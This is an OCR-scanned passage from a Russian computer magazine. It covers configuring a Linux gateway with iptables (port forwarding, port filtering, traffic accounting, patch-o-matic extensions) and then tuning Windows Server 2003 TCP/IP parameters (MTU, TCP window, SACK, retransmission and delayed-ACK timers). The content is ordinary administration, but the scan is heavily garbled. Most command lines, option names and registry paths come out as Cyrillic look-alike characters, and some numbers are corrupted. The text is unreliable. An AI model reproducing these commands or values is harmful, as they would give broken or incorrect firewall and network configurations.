--БрогЕ 22 -3 ББАТ --Ео-сІезЕіпаЕіоп 192.168.1.100 \ 
-С паЕ 

Именно так будет выглядеть строка, которая перенаправит пакеты с 
22-го порта шлюза на сервер 192.168.1.100. Теперь закроем этот порт для 
всех машин и откроем только для 192.168.1.100: 

# ірЕаЫез -I ШРБТ 1 -і 192.168.1.100 -р Еср \ 

— сірогр 22 -3 АССЕРТ 

# ірЕаЫез -I ШРБТ 2 -р Еср --БрогЕ 22 -3 КЕБЕСТ \ 

--гез есЕ-міЕК істр-рогЕ-ипгеас]таЪ1е 

Примечание: правило, стоящее в цепочке выше, является более 
привилегированным. 

Для того чтобы отрезать пакет, используется правило ОПОР, но если 
внимательно почитать руководство по ІрГаЫез на сайте разработчика, то 
можно увидеть, что автор рекомендует применять КЕ1ЕСТ, во избежание 
различных "ПоЗ-атак. 

И последним шагом мы отрубим все лишние порты. Пусть они по-пре- 
жнему будут видны изнутри, но на внешнем интерфейсе еГІіО нужно 
оставить самый минимум: 
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# ірЕаЫез -А ШРБТ -і еБЬ.0 -р Вер \ 

-ш тиІЕірогЕ \ 

— БрогД з 21,111,139,445,953,993,1723,2628 \ 

-3 ЕЕБЕСТ --гезесБ-тБЪ. істр-рогД-ипгеасЕаЫе 

Кстати, в последней строчке вместо ‘-т тиШрогЕ можно поставить ‘-т Тер’ 
и сформировать отдельное правило для каждого из портов. Такты смо- 
жешь видеть количество пакетов, полученных на каждый отдельный порт, 
и, соответственно, реально оценивать нагрузку и возможную угрозу. 

# ірСаЫез -А РЕЕЕОБТІШ -Б 100.100.100.100 \ 

-р Сер -ш Вер --БрогЕ 443 -3 БЕАТ \ 

--Ео-БезЕіпаЕіоп 192.168.3.100 -Е пар 

# ірЕаЫез -А РЕЕЕОБТІШ -сЗ 100.100.100.100 \ 

-р Сер -ш Сер --БрогЕ 8 О -3 ББАТ \ 

--Ео-БезЕіпаЕіоп 192.168.0.100 -Е паЕ 

# ІрЕаЫез -А РЕЕЕОБТІШ -сЗ 100.100.100.100 \ 

-р Сер -т Сер --БрогЕ 1433 -3 ББАТ \ 

--Ео-БезЕіпаЕіоп 192.168.2.100 -Е паЕ 

Так мы зарулим пакеты по их прямому назначению на другие серваки. 
Следующими строчками мы подружим сетевые интерфейсы между 
собой. Как правило, для таких целей используют хардварные маршру- 
тизаторы, но мы же не собираемся менять несколько ящиков пива на 
какие-то железные поделки, которые к тому же элементарно заменяются 
одним-единственным Ілпих+ІрЗаЫез :) . 

# ІрЕаЫез -А ЕОЕМАЕБ -і еЕШ -о еЕБ2 -3 АССЕРТ 

# ІрЕаЫез -А ЕОЕМАЕБ -і еЕЫ -о еЕБЗ -3 АССЕРТ 

# ІрЕаЫез -А ЕОЕМАЕБ -і еЕЫ -о еЕЬ4 -3 АССЕРТ 

# ІрЕаЫез -А ЕОЕМАЕБ -і еЕЬ4 -о еЕБЗ -3 АССЕРТ 

Как считать трафик 

Понятно, что если даже все пакеты рулятся, порты фильтруются, но 
сервак не умеет считать проходящий через него трафик, то грош цена та- 
кому админству. Эту проблему мы решим следующим образом: создадим 
цепочку, которая с помощью правила (^ІІЕІІЕ будет ссылаться на любую 
понравившуюся тебе систему учета. Я выбрал ИеТАМЗ. Последнюю 
версию этой замечательной программы можно скачать с пезатз.согп. 
Различные ЕА(2 и инструкции по установке лежат там же. 

Правило (21ШІІЕ занимается только тем, что посылает поступивший 
пакет в очередь на пользовательское приложение. Для того чтобы им вос- 
пользоваться, нужно воткнуть в ядро стандартный обработчик очереди 
для ІРѵ4 — модуль ір-циеие. Делается это примерно так: 



# шосЗргоЬе ірЕаЫе_ЕііЕег 

# шосЗргоЬе ір_диеие 

Теперь создадим цепочку, в которую будем отправлять весь трафик для 
подсчета: 

# ІрЕаЫез -Б СОШТЕЕ 

Напишем одно-единственное правило, а по цепочке пустим все оставши- 
еся пакеты: 

# ІрЕаЫез -А СОШТЕЕ -3 ОБЕБЕ 

# ІрЕаЫез -А ЕОЕМАЕБ -і еЕЬО -3 СОБЫТЕЕ 

# ІрЕаЫез -А ЕОЕѴ/АЕБ -о еЕЬО -3 СОБЫТЕЕ 

Здесь есть один очень важный момент. Дело в том, что с помощью 
приведенных выше правил все входящие и исходящие пакеты посту- 
пают в системную очередь, откуда их будет брать ИеТАМЗ. Однако 
если в момент активизации ІріаЫез ИеТАМЗ не будет запущен, пакеты 
поступят в системную очередь и там потеряются, поскольку не будет 
программы, которая отправит их обратно. В результате пропадет 
коннект с сервером. Поэтому в процессе отладки надо либо сидеть за 
консолью сервера, либо, в случае удаленного администрирования, 
тренироваться на ІСМР-трафике. А порядок запуска такой: сначала 
запускаем ИеТАМЗ, потом — ІрГаЫез. Соответственно, остановка 
осуществляется в обратном порядке: сначала останавливаем ІріаЫез, 
потом — ИеТАМЗ. 

Тонкая заточка 

Вот, собственно, и все, что требовалось для того, чтобы пакеты начали 
ходить по струнке, а порты отпинывали незваных гостей. Теперь самое 
время заняться тонкой настройкой. При необходимости можно отсту- 
пить от стандартных правил: 

// Вместо прямого адреса можно указать доменное имя: 

# ІрЕаЫез -А ШРБТ -з ЕезЕ.ЕюзЕ.зр -3 БЕОР 

//В качестве пункта назначения задаем целую подсеть: 

# ІрЕаЫез -А ШРБТ -з 192.168.133.0/24 -3 БЕОР 

// Восклицательный знак означает исключение. То есть в 
данном случае дропятся все адреса, кроме указанного: 

# ІрЕаЫез -А ШРБТ -з ! 192.168.133.156 -3 БЕОР 

Как ты уже заметил, несколько раз в правилах мы указывали опцию ‘-р\ 
Она задает обрабатываемый протокол. Можно использовать аіі, істр, 
Иср, ибр. 
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Ниже описаны стандартные правила для цепочек, которые указываются 
с ключом ‘-д ’ : АССЕРТ — разрешить пакет; ОПОР — уничтожить пакет; 
КЕбЕСТ — будет отправлено ІСМР-сообщение о том, что порт недосту- 
пен; ШС — информация об этом пакете будет добавлена в системный 
журнал (зуз1о§) . 

Скрытые возможности 

Вот мы и подошли к самому сладкому. . . Если ты считаешь, что у ІрГаЫез 
слишком узкий набор возможностей, то эта часть статьи как раз для 
тебя. С сайта Йр.пеШкег.ог^ скачай последнюю версию тарбола ращЬ-о- 
тагіс, этот патч добавляет ІріаЫез 54 расширения. Есть версии для ядер 
2.4 и 2.6. Установка пакета достаточно проста (возможно, раісй-о-тайс 
уже собран в твоем «коробочном» ядре, особенно если ты счастливый 
обладатель серверного дистрибутива) : 

/ / Для Ьігшх 2 . 4 

# КЕВЫЕЬ_БІЕ=путь_к_сорцам_ядра_2 . 4 . /гипше репсііпд 
// Для Ьіпих 2 . б 

# КЕЕБЕЬЫ)ІВ=путь_к_сорцам_ядра_2 . 6 \ 

ІРТАВЕЕ8Ы)ІВ=путь_к_сорцам_ірЕаЪ1ез . /гипше репсііпд 

Затем следует перекомпилировать ядро и ІріаЫез. После этого рагсН- 
о-тайс становится частью ІріаЫез, и со всеми его правилами и целями 
можно работать как со встроенными. Для того чтобы получить помощь 
по любому расширению, введи в консоли: 

# ІрЕаЫез -ш любая_цель_или_правило --Ееір 

Расширение І_епдІЬ 

Расширение Ьеп^Ь обрабатывает правила в соответствии с заданной 
длиной пакета: 

# ІрЕаЫез -А ШРБТ -р ісшр --істр-Еуре есЬо-гедиезЕ \ 

-т ІепдЕЬ --ІепдЕЬ 86:0хЕЕЕЕ -д БЕОР 

Это перекроет кислород всем, кто будет пинговать тебя больше чем по 
86 байт за один присест. 

Расширение №Н 

Расширение — еще одна полезная надстройка над ІріаЫез. Она 

обрабатывает каждый №ый пакет по заданному правилу. Например, сле- 
дующая строчка задропит каждый второй пакет типа ісгпр есйо-гедиезц 

# ІрЕаЫез -А ШРБТ -р ісшр --істр-Еуре есЬо-гедиезЕ \ 

-ш пЕЪ. --еѵегу 2 -д БЕОР 

Если тебя постоянно терроризируют ЭоЗ ДЮоЗ-атаками, советую поб- 
лиже познакомиться с двумя вышеописанными модулями. 

Расширение Рзсі 

Это очень полезное расширение, которое перехватывает сканирование 
портов. Против грамотного использования птар рзб будет бессилен, но 
большинство топорных проб он распознает и пресекает на корню. Этим 
правилом мы захватываем сразу все имеющиеся порты: 



# ІрЕаЫез -А ШРБТ -ш рзБ -д БЕОР 

Расширение Бігіпд 

Это расширение анализирует область данных пакета и на основе 
этого производит фильтрацию. Здесь важно не перестараться. 

Если тебя одолевают спамеры, а от слова рогпо тебя слегка 
потрясывает, можешь добавить следующую строку: 

# ІрЕаЫез -А РОЕЭДАЕБ -і еЕБО -р Еср --зрогЕ 2 5 

-ш зЕгіпд --зЕгіпд 'рогпо' -д БЕОР 

Пакет исчезнет прежде, чем дойдет до твоего спам-фильтра. Не забывай, 
что расширение чувствительно к регистру символов! 

Расширение Ііте 

Это расширение обрабатывает пакеты в указанное время. 
Следующий пример демонстрирует ограничение доступа к серверу 
по пятницам с 2:00 до 4: 15 (например, для выполнения планового 
обновления): 

# іріаЫез -А ШРБТ -р Еср -сі 80 -ш Біше \ 

--БішезБагБ 02:00 --БішезБор 04:15 --сіауз Егі \ 

--зуп -Д ЕЕБЕСТ 

Все три ключа, ‘-йтезіагі:’, ‘-гітезвэр’ и ‘-бауз’, должны быть обязатель- 
но включены в правило. 

Расширение гапсіот 

Используя это расширение, можно построить такой критерий, кото- 
рый будет срабатывать с вероятностью в диапазоне от 0% до 100%. К 
примеру, для балансировки нагрузки распределим трафик по четырем 
серверам: 

# іріаЫез -Б паі -А РЕЕЕОБТШС -і еБІіО -р Бср \ 

--БрогБ 80 --зуп -ш гапБот --аѵегаде 25 \ 

-д ББАТ --Бо-БезБіпаБіоп 192.168.0.100:80 

# ірЕаЫез -Е паЕ -А РЕЕЕОБТШС -і еЕАО -р Еср \ 

--БрогЕ 80 --зуп -ш гапБош --аѵегаде 25 \ 

-д ББАТ --Ео-БезЕіпаЕіоп 192.168.0.101:80 

# ірЕаЫез -Е паЕ -А РЕЕЕОБТІБС -і еЕБО -р Еср \ 

--БрогЕ 80 --зуп -ш гапБош --аѵегаде 25 -д ББАТ \ 
--Ео-БезЕіпаЕіоп 192 . 168 . 0 . 102 : 80 

# ІрЕаЫез -Е паЕ -А РЕЕЕОБТШС -і еЕБО -р Еср \ 

--БрогЕ 80 --зуп -ш гапБош --аѵегаде 25 \ 

-д ББАТ --Ео-БезЕіпаЕіоп 192.168.0.103:80 

Подводим итоги 

Вот мы и настроили абсолютно полноценный сервак-шлюз 
с помощью практически одного только ІрііаЫез. Выводы 
делай сам, но лично я давным-давно уже перевел 
все свои серваки именно на такое управление, чего и тебе 
советую. 
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ТУРБОРЕАКТИВНОГО 

ПОЛЕТА 



ТОНКАЯ НАСТРОЙКА ПАРАМЕТРОВТСР/ІР ПОД ТОЛСТЫЕ КАНАЛЫ 

Пропускная способность локальных сетей и интернет-каналов неуклонно растет, однако вместе с ней 
растут и потребности, вызывающие естественное желание выжать из стека ТСР/ІР максимум возможно- 
го. Этим мы сейчас, собственно, и займемся, акцентируя внимание главным образом на ѴѴіпсІоѵѵз Зегѵег 
2003, хотя описанные технологии оптимизации справедливы и для рабочих станций, собранных на базе 



ѴѴ2К/ХР. 

о поводу кручения настроек ТСР/ІР существует два 
диаметрально противоположных мнения. Многие 
администраторы (а вместе с ними и авторы популярных 
книг) считают, что разработчики уже сделали все что 
нужно и любое вмешательство в этот четко отлаженный механизм 
может только навредить. В то же самое время в интернете валяется 
множество руководств, обещающих радикальное увеличение произ- 
водительности ценой изменения пары-тройки ключей в системном 
реестре. 

Истина, как водится, где-то по середине. Операционные системы уже 
давно научились автоматически распознавать тип подключения, выби- 
рая соответствующий ему набор настроек по умолчанию. Адаптивные 
алгоритмы динамически подстраиваются под характеристики канала, и 
неквалифицированные указания пользователя, действительно, только 
мешают. Однако адаптивным алгоритмам свойственно ошибаться, а на- 
стройки по умолчанию далеко не всегда соответствуют характеристикам 



конкретно взятых каналов связи, разброс которых просто колоссален. 
Какой прирост производительности может дать оптимизация парамет- 
ров ТСР/ІР при условии, что она выполнена правильно? Это зависит от 
того, насколько настройки по умолчанию близки к свойствам исполь- 
зуемого канала. В среднем следует ожидать 20-30% выигрыша, однако в 
«клинических» случаях скорость может увеличиться в несколько раз! 

Прежде чем приступать к оптимизации 

Вместо того чтобы, засучив рукава, с первых же строк бросаться в бой, 
лучше сперва покурить и подумать. Допустим, мы имеем 10-мегабитный 
канал и скачиваем/раздаем файлы с преимущественной скоростью 
порядка мегабайта в секунду. Понятно, что никакими ухищрениями нам 
не удастся поднять производительность до сколько-нибудь заметной ве- 
личины . Так стоит ли возиться? К тому же достаточно большое количест- 
во администраторов умышленно ущемляет отдачу в районе 50-100 Кб/с, 
предотвращая перегрузку сети. Какая уж тут оптимизация... 
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Другое дело, если наблюдаемая пропускная способность составляет 
менее двух третей от заявленной аплинком. Тут уже без оптимизации 
никакие обойтись! Однако, помимо стека ТСР/ІР, за производитель- 
ность отвечают и другие системные компоненты, например процессор. 
При большом количестве одновременно установленных соединений 
загрузка ЦП может достигать 100%. 

Еще одна виновница — видеокарта, надолго захватывающая шину безо 
всяких видимых причин, в результате чего все остальные периферийные 
устройства садятся на голодный паек и скорость ввода/вывода (в том 
числе и сетевого) многократно снижается. Обновление драйверов или 
отключение всех «агрессивных» настроек видеокарты в этой ситуации 
может помочь. 

Также не стоит забывать и о том, что чрезмерная фрагментация диско- 
вого пространства существенно замедляет скорость отдачи/приема 
файлов, что является одной из основных причин замедления загрузок 
ѵѵеЪ-страничек у конечных пользователей. 

В общем, прежде чем лезть в стек ТСР/ІР, следует убедиться, что все 
остальные возможные причины устранены и узким местом являются 
именно настройки сетевых протоколов, а не что-то иное (внимание: 
«убедиться» — это совсем не то же самое, что «убедить себя») . 

МТи + М55 = ??? 

МШ (Махітит Тгапзтіззіоп Шіи — максимальный размер передаваемо- 
го пакета), вероятно, самый известный параметр ТСР/ІР, рекомендации 
по настройке которого можно встретить практически в любой статье по 
оптимизации ТСР/ІР. Сотни утилит предлагают свои услуги по опреде- 
лению предельно точного значения, но, увы, обещанного увеличения 
производительности не достигается. 

МШ задает наибольший возможный размер отправляемого ІР-пакета 
(вместе с заголовком) , нарезая отправляемые данные на порции фик- 
сированного размера. Чем больше МШ, тем ниже накладные расходы 
на передачу служебной информации, а значит, выше КПД канала. С 
другой стороны, маршрутизаторы сваливают пакеты, поступающие от 
разных узлов, в общую очередь, и потому гораздо выгоднее отправить 
один большой пакет, чем два маленьких, причем чем сильнее загружен 
маршрутизатор, тем больший выигрыш мы ползшим. 

Так в чем же дело?! Выкраиваем МШ до пределаи... скорость падает до 
нуля. Почему? Причина в том, что с ростом размера пакетов увеличива- 
ется и время, необходимое для их повторной передачи, в том случае если 
пакет потерян или искажен. К тому же промежуточные узлы имеют свои 
собственные настройки, и если размер передаваемого пакета превышает 
текущий МШ, пакет разрезается на два или более пакетов (то есть фраг- 
ментируется), и эти фрагменты собираются воедино только на узле-при- 
емнике, в результате чего пропускная способность уменьшается. Причем 
если МШ узла отправителя лишь чуть-чуть превышает МШ промежуточ- 
ного узла, то второй пакет состоит практически из одного заголовка. 



Запускам утилиту редактора реестра и открываем в ней следующий 
раздел: НІШѵ1\ЗУЗТЕМ\СиггетСот:го13еі\$егѵісе5\Тсрір\Рагатеі:ег5\ 
ІпіегІасезЧітегІасеСІІГО. Видим параметр МШ типа ПѴЮКП (а если не 
видим, то создаем) и вводим требуемый размер в байтах (например, 
ОхЕРРРРРРР означает «использовать значение МШ по умолчанию») . 
Интерфейсы заданы (ШГО-идентификаторами, и обычно их бывает 
намного больше одного. Как среди них найти интерфейс кабельного 
модема или конкретной сетевой карты? Да очень просто — по ІР-адресу ! 
Существует возможность автоматического определения маршрута, 
по которому пакеты с заданным МШ проходят без фрагментации 
(параметр ЕпаЫеРМТІЮізсоѵегу типа ПѴЮШЗ, находящийся в той же 
ветви реестра, что и МШ; значение «1» включает эту функцию, «0» 
выключает) . Однако многие администраторы промежуточных узлов по 
соображениям 

безопасности блокируют отправку ІСМР-сообщений, и узел-отправитель 
остается в полном неведении относительно факта фрагментации. Спе- 
циально для обнаружения таких вот «неправильных» маршрутизаторов 
(прозванных «черными дырами») ѴѴіпсІоѵѵз поддерживает специальный 
алгоритм, управляемый параметром ЕпаЫеРМТШізсоѵегу (во всем ана- 
логичным ЕпаЫеРМТІГОізсоѵегу) . В подавляющем большинстве случаев 
использование опций ЕпаЫеРМТІЮізсоѵегу и ЕпаЫеРМТІЮізсоѵегу 
приводит к снижению производительности. 

Еще один параметр — МЗЗ (Махітит Зе§тет Зіге — максимальный раз- 
мер сегмента) — отвечает за максимальный размер передаваемых данных 
за вычетом длины заголовка ІР-пакета. Трогать его не следует, да и ѴѴіпсІоѵѵз 
все равно этого не позволит. В общем случае МЗЗ = МШ - 40 байт. 

ТСР Весеіѵе ѴѴіпсІоѵѵ 

Размер ТСР-окна — малоизвестный, но чрезвычайно важный (в плане 
производительности) параметр, способный увеличить пропускную 
способность в несколько раз. Рассмотрим два узла, А и В, и заставим узел 
А передавать узлу В данные, разбитые на сегменты, размер которых (как 
уже говорилось) определяется параметром МЗЗ. Протокол ТСР работает 
с установкой соединения, что обязывает его отправлять уведомления 
об успешно принятых сегментах. Неподтвержденные сегменты спустя 
некоторое время передаются узлом А вновь. 

Промежуток времени между отправкой пакета и его получением назы- 
вается задержкой (Іаіепсу), и эта латентность в зависимости от типа и 
загруженности сети варьируется от 20 мс (и менее) до 100 мс (и более) . 
Легко посчитать, что если бы подтверждался каждый сегмент, то даже в 
низколатентной сети реальная скорость передачи заметно отставала бы 
от ее потенциальных возможностей и была бы равна МШ/(2*1аіепсу), 
что образует предел в 6 Мбит/с, не зависящий от пропускной способнос- 
ти. Кошмар! 

Вот поэтому создатели ТСР/ІР и разрешили узлу А отправлять более 
одного сегмента, не дожидаясь подтверждения. Максимальное количес- 
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тво сегментов, которое можно передать до прихода подтверждения, и 
называется размером ТСР-окна. 

Почему этот параметр так важен для достижения наибольшей произво- 
дительности? Допустим, мы имеем канал 10 Мбит и передаем 7 сегмен- 
тов по 1 460 байт каждый, тратя на это 8 мс. Если латентность составляет 
100 мс, то 100 мс + 92 мс = 192 мс. Мы, как идиоты, ждем подтверждения 
целых 

192 мс, и 96% времени узел А проводит в бездействии, используя лишь 
4% пропускной способности канала. Это, конечно, крайний случай, но 
все-таки не настолько нереальный, как можно было бы подумать. 

В процессе установки соединения узел А предлагает узлу В выставить 
размер окна, равный 16 Кб (значение по умолчанию, прописанное в 
параметре реестра ТсрѴѴіпсІоѵѵЗіге, которое при желании можно изме- 
нить) . Если размер окна превышает 64 Кб, система активирует алгоритм 
автоматического масштабирования, который, впрочем, работает только 
в том случае, если узел В также поддерживает этот механизм. Однако 
следует помнить, что слишком большое окно забивает канал пакетами, 
вызывая перегрузку сети, препятствующую пересылке уведомлений, в 
результате чего производительность падает. 

Две рекомендации: если клиенты локальной сети работают через ргоху- 
сервер, то для достижения максимальной производительности достаточ- 
но изменить размер ТСР-окна непосредственно на самом сервере; при 
работе через МАТ необходимо настроить ТСР-окно на каждой рабочей 
станции, подключенной к локальной сети. 

Медленный старт и выборочное подтверждение 

Для предотвращения перегрузок сети в протокол ТСР был введен так 
называемый «медленный старт» (зіоѵѵ зіагі:), подробно описанный в 
КЕС 1 122 и КЕС 2581. При создании нового ТСР/ІР-соединения система 
устанавливает размер окна, равный одному сегменту. После получения 
подтверждения размер окна увеличивается вдвое, и так продолжается 
вплоть до достижения максимально возможного размера. 
Экспоненциальный рост ширины окна съедает совсем немного времени 
при передачи огромных файлов, но вот при установке множества ТСР/ 
ІР-соединений (характерных, например, для браузеров), обмениваю- 
щихся крошечными порциями данных, медленный старт заметно сни- 
жает эффективность широких каналов. Кроме того, даже при кратковре- 
менной перегрузке сети система сбрасывает размер окна в единицу. 
Нельзя забывать и про специальный параметр Зіоѵѵ ЗіаН: ТЪгезЬоШ Зіге 
(пороговый размер окна медленного старта), по умолчанию равный 
65636. После распознавания перегрузки сети он может вызвать драмати- 
ческое падение производительности. 

Отключить медленный старт штатными средствами ѴѴіпсіоѵѵб (не при- 
бегая к патчу ядра) нельзя, однако если задействовать ЗАСК-алгоритм 
(Зеіесііѵе Аскпошіес^етепі: — выборочное подтверждение, одно из 
расширений ТСР-протокола, описанное в КЕС 2018), то медленный старт 
вырубается сам собой, становясь при этом никому не нужным пережит- 
ком старины. 

Выборочное подтверждение передачи позволяет осуществлять 
повторную передачу неподтвержденных сегментов в одном окне (при 
неактивном ЗАСК’е потерянные сегменты посылаются один за другим в 
индивидуальном порядке) . Другими словами, узел А повторно передает 
узлу В только реально потерянные сегменты, а не весь блок, в состав 
которого входят и успешно принятые пакеты. Очевидно, что максималь- 
ный прирост производительности будет наблюдаться на нестабильных 



каналах связи, регулярно теряющих пакеты. Для активации алгоритма 
ЗАСК достаточно установить параметр реестра ЗаскОрЩ в значение «1». 

Время, работающее против нас 

С подтвержденными сегментами все ясно. Если подтверждение пришло, 
сегмент можно считать успешно доставленным. Весь вопрос в том, 
сколько это самое подтверждение ждать и когда начинать повторную 
пересылку. 

По умолчанию ѴѴіп2003 ждет 3 секунды (при желании это значение 
можно изменить редактированием параметра ТсрІпійаІКТТ), после чего 
осуществляется повторная пересылка неподтвержденных пакетов, а сам 
интервал ожидания увеличивается в соответствии с алгоритмом ЗКТТ 
(ЗтооіЬесі Коипсі Тгір Тіте — сглаженное оцененное время обращения) . 
Максимальное количество повторных передач хранится в параметре 
ТсрМахПаЩКеігапБтІББІопз (по умолчанию он равен пяти), при достиже- 
нии которого соединение разрывается. 

Очевидно, что на нестабильных каналах, страдающих хроническими 
задержками, количество разрывов соединений можно сократить путем 
увеличения параметра ТсрМахПаіаКеігапБгпІББІопБ до любой разумной 
величины (но не больше ЕЕЕЕЕЕЕЕЬ) . С другой стороны, для повышения 
производительности и нейтрализации пагубного влияния потерянных 
пакетов на быстрых каналах с малым временем задержки значение 
ТсрІпійаІКТТ рекомендуется уменьшить до одной секунды. 

Главный недостаток статического таймера в его неспособности реаги- 
ровать на кратковременные изменения характеристик канала связи. 
Выбранное системой время ожидания подтверждения оказывается 
недостаточно, то велико. Производительность падает, пользователь рвет 
и мечет, а пропускная способность плавает в очень широких пределах, 
заметно отставая от ожидаемой. 

Задержанное подтверждение (Пеіауесі Аскпошіес^етепі:) — еще 
одно расширение протокола ТСР/ІР, описанное в КЕС 1 122 и впервые 
реализованное в ИТ 4.0 ЗР4 и ѴѴ2К. Вместо того чтобы подтверждать 
каждый полученный сегмент, узел В здесь отправляет подтверждение 
только в том случае, если в течение определенного промежутка времени 
(хранящегося в параметре ТсрПеІАскТіскз и по умолчанию равного 200 
мс) от узла Ане было получено ни одного сегмента. Другими словами, 
если сегменты идут дружными косяками и все работает нормально, 
подтверждения не отправляются до тех пор, пока в сети не возникнет 
«затор». Немного подождав, узел В высылает подтверждение всех 
полученных сегментов, давая узлу А возможность самостоятельно разо- 
браться, какие сегменты потерялись в дороге, и передать их повторно с 
минимальными накладными расходами. 

К сожалению, задержка, выбранная компанией МісгобоЙ по умолчанию, 
близка к латентности сетей с большими задержками, что сводит на нет 
все достоинства этого алгоритма, и для повышения производитель- 
ности значение ТсрЭеІАскТіскз рекомендуется увеличить в несколько 
раз. Соответственно, на низколатентных сетях его лучше уменьшить, 
ликвидируя никому не нужные простои. Значения этого параметра 
могут варьироваться в диапазоне от 0 до 6, выражаемом в десятых долях 
секунды, то есть единица соответствует 100 мс, а ноль трактуется как 
запрет на использование задержанных подтверждений. 

При использовании ТСР-окон большого размера рекомендуется задейс- 
твовать алгоритм временных меток (ТСР-ТітезіатрБ), описанный в КЕС 
1323, автоматически адаптирующий значение таймера повторной пере- 
дачи даже в условиях быстро меняющихся характеристик канала связи. 
За это отвечает параметр Тср13230рі5, который, будучи установленным 
в значение 3, разрешает использование всех расширений КЕС 1323 . 1 . 
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